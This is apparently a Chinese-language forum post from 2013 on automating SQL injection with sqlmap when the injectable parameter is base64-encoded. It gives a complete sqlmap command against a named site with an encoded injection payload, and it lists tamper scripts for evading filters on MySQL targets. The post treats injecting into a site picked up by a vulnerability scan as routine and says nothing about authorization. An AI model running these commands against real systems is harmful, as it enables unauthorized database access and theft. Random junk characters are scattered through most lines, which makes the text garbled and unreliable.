WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?" T! l. V. i2 K2 k0 u8 p
& I/ t1 {% t' k: Q6 k5 Tsqlmap的tamper里有个base64encode.py
8 A$ m/ C1 a6 Z8 o# y8 z
8 h0 S3 ^+ o, G1 f使用如下
9 m7 Q, t9 h O# u8 d/ Y0 M& Z8 f$ a" O6 S% l5 j
sqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs6 I! k4 D+ s5 \6 n) R" T+ G
/ D# F$ V8 N/ P0 y) Z! M" `
$ d7 K- `. ]! B8 I' T. _2 [6 ^4 x
sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”$ L% S. F+ |0 q" O2 c! t
1 W- t1 I' O1 J. ^9 k$ \7 L8 A5 u其中常用到的bypass脚本绕过SQLMAP主要两个脚本:
9 F" ?& \8 W* e
0 O/ M7 Q8 O0 h: ] i l; d Gspace2hash.py ,对于MYSQL数据库 4.0, 5.0注入) ], A) c5 X1 P2 J8 c, N& z
space2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入8 z3 c. z* s8 r, R: c3 }1 Y1 _) v4 Y
首先确定目标数据库版本,然后选择相应的脚本。( ]: W' `9 d4 a
-v 3 --batch --tamper "space2hash.py"
& V; v- S8 U7 b3 s
! S' l0 I6 R8 p" g3 J还有其他一些插件:4 Y/ g3 r' U+ f) ^& [
encodes编码 ——charencode.py# f. E0 f) `* |" ]0 R/ L+ X
base64编码 —— base64encode.py/ f# Y7 r5 _9 F0 l
替换空格和关键字 —— halfversionedmorekeywords.py
9 q: N& Q; O" [( } |
' a: j- a" l. x. U( r9 J
3 w% B/ N! t) A2 f, S
( Y. u& Z, }# F6 @. I4 l3 i! A
% J7 U' }& r' K# w4 k( Q: j |
发表于 2013-11-23 15:50:45
收藏
支持
反对